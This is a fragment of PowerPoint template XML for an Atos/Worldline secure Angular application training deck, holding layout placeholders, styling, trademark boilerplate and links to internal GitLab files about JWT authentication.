      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6047901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Content Basic ">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179512" y="4731990"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="8741280" cy="488050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1131590"/>
            <a:ext cx="8636880" cy="34341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14" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="4731990"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="nl-NL"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdan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489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161742" y="771550"/>
            <a:ext cx="8703442" cy="360362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="180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endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185459512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Basic + Picture 1">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94400" y="4738500"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="5356904" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="5040560" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="270000" indent="-270000">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:buChar cha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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Picture Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580112" y="411510"/>
            <a:ext cx="3934657" cy="3960440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2819493706"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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act 1">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3" descr="C:\00-Guidelines\Template\Digital\Sales\intercalaires\White-line.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 r="27729" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2913603" y="2048267"/>
            <a:ext cx="3321482" cy="914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942184" y="3795885"/>
            <a:ext cx="1264320" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Worldline</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2913602" y="1275606"/>
            <a:ext cx="3242573" cy="720080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50886510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ntact 2">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89188" y="771550"/>
            <a:ext cx="4734000" cy="720080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AddNotifier#1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2207344" y="2355725"/>
            <a:ext cx="4734000" cy="1134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900" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atos, the Atos logo, Atos Consulting, Atos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Worldgrid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Worldline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BlueKiwi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Bull, Canopy the Open Cloud Company, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Yunano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Zero Email, Zero Email Certified and The Zero Email Company are registered trademarks of the Atos group. May 2015. © 2015 Atos. Confidential information owned by Atos, to be used by the recipient only. This document, or any part of it, may not be reproduced, copied, circulated and/or distributed nor quoted without prior written approval from Atos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AddClassification"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4075131" y="4789800"/>
            <a:ext cx="9621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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Worldline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="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695529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fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30603953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200" y="283500"/>
            <a:ext cx="8748000" cy="567000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140400" y="1090800"/>
            <a:ext cx="8748000" cy="34749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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194400" y="4731990"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AddCustomFooter#1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477355" y="4743390"/>
            <a:ext cx="4238661" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> | Secure Angular Application Training  by SDCO | © </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Worldline</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1000" dirty="0">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Groupe 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="925769">
            <a:off x="7236296" y="339502"/>
            <a:ext cx="1728192" cy="686981"/>
            <a:chOff x="6912768" y="104314"/>
            <a:chExt cx="2267744" cy="594478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="ZoneTexte 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6948263" y="104314"/>
              <a:ext cx="2195736" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Angular</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t> Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Hardening</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t> training</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Accolades 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6912768" y="104314"/>
              <a:ext cx="2267744" cy="594478"/>
            </a:xfrm>
            <a:prstGeom prst="bracePair">
              <a:avLst>
                <a:gd name="adj" fmla="val 12172"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="50800">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="95000"/>
                  <a:satMod val="10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762946546"/>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86" r:id="rId3"/>
    <p:sldLayoutId id="2147483650" r:id="rId4"/>
    <p:sldLayoutId id="2147483668" r:id="rId5"/>
    <p:sldLayoutId id="2147483661" r:id="rId6"/>
    <p:sldLayoutId id="2147483687" r:id="rId7"/>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a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="270000" indent="-270000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="540000" indent="-270000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="384"/>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2pPr>
      <a:lvl3pPr marL="81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3pPr>
      <a:lvl4pPr marL="108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1350000" indent="-270000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>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bitbucket.org/connect2id/nimbus-jose-jwt/src" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/webapp/index.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/java/org/jboss/as/quickstarts/kitchensink/security/jwt/DefaultJWTTokenGenerator.java"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gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/java/org/jboss/as/quickstarts/kitchensink/rest/Authenticator.java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/webapp/js/controllers.js" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/webapp/js/app.js" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/sdcosecurity/sdco-security-shiro-jboss-stack/blob/master/src/main/java/org/jboss/as/quickstarts/kitchensink/security/jwt/JWTRequestInterceptor.java"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hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/blob/PW-JWT-OAuth/bookstore/src/main/java/com/worldline/bookstore/security/jwt/JWTFilter.java" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app/blob/PW-JWT-OAuth/src/app/services/auth/auth-jwt.service.ts" TargetMode="External"/><Relationship Id="rId7" 